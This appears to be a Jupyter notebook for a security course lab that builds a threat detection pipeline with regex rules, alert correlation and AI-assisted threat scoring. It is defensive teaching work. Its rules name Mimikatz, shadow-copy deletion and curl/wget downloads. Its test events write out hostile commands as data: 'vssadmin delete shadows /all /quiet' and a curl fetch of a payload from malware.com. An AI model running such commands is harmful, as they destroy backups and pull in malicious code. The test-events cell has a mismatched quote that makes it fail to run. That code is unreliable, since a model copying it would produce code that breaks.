# Lab 09: Threat Detection Pipeline

Build an end-to-end threat detection pipeline with AI-powered analysis.

[![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/depalmar/ai_for_the_win/blob/main/notebooks/lab09_detection_pipeline.ipynb)

## Learning Objectives
- Multi-stage detection architecture
- Alert correlation and triage
- ML-based threat scoring
- Automated alert enrichment

In [None]:
from typing import List, Dict, Optional
from dataclasses import dataclass, field
from datetime import datetime
from enum import Enum
import json

## 1. Detection Data Models

In [None]:
class AlertSeverity(Enum):
    CRITICAL = 4
    HIGH = 3
    MEDIUM = 2
    LOW = 1

@dataclass
class Alert:
    """Security alert."""
    id: str
    timestamp: str
    title: str
    severity: AlertSeverity
    source: str
    host: str
    description: str
    mitre_techniques: List[str] = field(default_factory=list)
    iocs: List[str] = field(default_factory=list)
    enrichment: Dict = field(default_factory=dict)

@dataclass  
class Detection:
    """Detection rule match."""
    rule_id: str
    rule_name: str
    severity: AlertSeverity
    matched_data: Dict
    timestamp: str

# Sample alerts
SAMPLE_ALERTS = [
    Alert(
        id="ALT-001",
        timestamp="2024-01-15T09:15:00Z",
        title="Encoded PowerShell Execution",
        severity=AlertSeverity.HIGH,
        source="EDR",
        host="WORKSTATION-42",
        description="PowerShell with -enc parameter detected",
        mitre_techniques=["T1059.001"],
        iocs=["powershell.exe -enc SGVsbG8="]
    ),
    Alert(
        id="ALT-002",
        timestamp="2024-01-15T09:16:00Z",
        title="C2 Beacon Detected",
        severity=AlertSeverity.CRITICAL,
        source="NDR",
        host="WORKSTATION-42",
        description="Periodic beaconing to known C2 IP",
        mitre_techniques=["T1071.001"],
        iocs=["185.143.223.47"]
    )
]

print(f"Loaded {len(SAMPLE_ALERTS)} alerts")

## 2. Detection Rule Engine

In [None]:
import re

class DetectionRule:
    """Simple detection rule."""
    
    def __init__(self, rule_id: str, name: str, severity: AlertSeverity, pattern: str):
        self.rule_id = rule_id
        self.name = name
        self.severity = severity
        self.pattern = pattern
        self.compiled = re.compile(pattern, re.IGNORECASE)
    
    def match(self, data: str) -> Optional[Detection]:
        if self.compiled.search(data):
            return Detection(
                rule_id=self.rule_id,
                rule_name=self.name,
                severity=self.severity,
                matched_data={"input": data[:100]},
                timestamp=datetime.now().isoformat()
            )
        return None

# Detection rules
RULES = [
    DetectionRule("R001", "Encoded PowerShell", AlertSeverity.HIGH, r"powershell.*-enc"),
    DetectionRule("R002", "Mimikatz Execution", AlertSeverity.CRITICAL, r"mimikatz|sekurlsa"),
    DetectionRule("R003", "Shadow Copy Deletion", AlertSeverity.CRITICAL, r"vssadmin.*delete"),
    DetectionRule("R004", "Suspicious Download", AlertSeverity.MEDIUM, r"curl|wget.*http"),
]

# Test rules
test_data = "cmd.exe /c powershell -enc SGVsbG8gV29ybGQ="
print(f"Testing: {test_data}")
for rule in RULES:
    match = rule.match(test_data)
    if match:
        print(f"  Matched: {rule.name} [{rule.severity.name}]")

## 3. Alert Correlator

In [None]:
class AlertCorrelator:
    """Correlate related alerts into incidents."""
    
    def __init__(self, time_window_minutes: int = 30):
        self.time_window = time_window_minutes
    
    def correlate(self, alerts: List[Alert]) -> List[Dict]:
        """Group alerts by host and time window."""
        # Group by host
        by_host = {}
        for alert in alerts:
            if alert.host not in by_host:
                by_host[alert.host] = []
            by_host[alert.host].append(alert)
        
        # Create correlated incidents
        incidents = []
        for host, host_alerts in by_host.items():
            if len(host_alerts) > 1:
                # Multiple alerts = potential incident
                max_severity = max(a.severity.value for a in host_alerts)
                techniques = set()
                for a in host_alerts:
                    techniques.update(a.mitre_techniques)
                
                incidents.append({
                    "incident_id": f"INC-{host}-001",
                    "host": host,
                    "alert_count": len(host_alerts),
                    "max_severity": AlertSeverity(max_severity).name,
                    "techniques": list(techniques),
                    "alerts": [a.id for a in host_alerts]
                })
        
        return incidents

# Correlate
correlator = AlertCorrelator()
incidents = correlator.correlate(SAMPLE_ALERTS)

print("Correlated Incidents:")
for inc in incidents:
    print(f"  {inc['incident_id']}")
    print(f"    Host: {inc['host']}")
    print(f"    Alerts: {inc['alert_count']}")
    print(f"    Max Severity: {inc['max_severity']}")
    print(f"    Techniques: {inc['techniques']}")

## 4. AI Threat Scorer

In [None]:
class ThreatScorer:
    """AI-powered threat scoring."""
    
    def __init__(self):
        try:
            from anthropic import Anthropic
            self.client = Anthropic()
            self.available = True
        except:
            self.available = False
    
    def score_incident(self, incident: Dict, alerts: List[Alert]) -> Dict:
        """Score incident severity with AI analysis."""
        if not self.available:
            return self._mock_score(incident, alerts)
        
        alert_summaries = "\n".join([
            f"- [{a.severity.name}] {a.title}: {a.description}"
            for a in alerts
        ])
        
        prompt = f"""Analyze this security incident and provide a threat score (1-100):

Host: {incident['host']}
Alert Count: {incident['alert_count']}
MITRE Techniques: {incident['techniques']}

Alerts:
{alert_summaries}

Provide:
1. Threat score (1-100)
2. Confidence level
3. Brief analysis
4. Recommended priority

Return as JSON."""
        
        response = self.client.messages.create(
            model="claude-sonnet-4-20250514",
            max_tokens=256,
            messages=[{"role": "user", "content": prompt}]
        )
        
        return json.loads(response.content[0].text)
    
    def _mock_score(self, incident: Dict, alerts: List[Alert]) -> Dict:
        score = 50 + len(alerts) * 10
        if incident['max_severity'] == 'CRITICAL':
            score += 30
        return {
            "threat_score": min(100, score),
            "confidence": 0.85,
            "analysis": f"Multiple related alerts on {incident['host']} suggest active threat",
            "priority": "P1" if score >= 80 else "P2"
        }

# Score
scorer = ThreatScorer()
if incidents:
    score_result = scorer.score_incident(incidents[0], SAMPLE_ALERTS)
    print("Threat Score:")
    print(json.dumps(score_result, indent=2))

## 5. Detection Pipeline

In [None]:
class DetectionPipeline:
    """End-to-end detection pipeline."""
    
    def __init__(self):
        self.rules = RULES
        self.correlator = AlertCorrelator()
        self.scorer = ThreatScorer()
    
    def process(self, events: List[str]) -> Dict:
        """Process events through pipeline."""
        # Stage 1: Detection
        detections = []
        for event in events:
            for rule in self.rules:
                match = rule.match(event)
                if match:
                    detections.append(match)
        
        # Stage 2: Alert Generation
        alerts = []
        for i, det in enumerate(detections):
            alerts.append(Alert(
                id=f"ALT-{i+1:03d}",
                timestamp=det.timestamp,
                title=det.rule_name,
                severity=det.severity,
                source="Detection Engine",
                host="WORKSTATION-01",
                description=f"Rule {det.rule_id} matched"
            ))
        
        # Stage 3: Correlation
        incidents = self.correlator.correlate(alerts)
        
        return {
            "detections": len(detections),
            "alerts": len(alerts),
            "incidents": incidents
        }

# Test pipeline
pipeline = DetectionPipeline()

test_events = [
    "powershell.exe -enc SGVsbG8=',
    "vssadmin delete shadows /all /quiet",
    "normal user activity",
    "curl http://malware.com/payload"
]

result = pipeline.process(test_events)
print(f"Detections: {result['detections']}")
print(f"Alerts: {result['alerts']}")
print(f"Incidents: {len(result['incidents'])}")

## Summary

We built a complete threat detection pipeline:

1. **Rule Engine** - Pattern-based detection
2. **Alert Generation** - Structured alert creation
3. **Correlation** - Group related alerts
4. **AI Scoring** - Threat prioritization

### Next Steps:
1. Add Sigma rule support
2. Implement ML-based anomaly detection
3. Create real-time streaming pipeline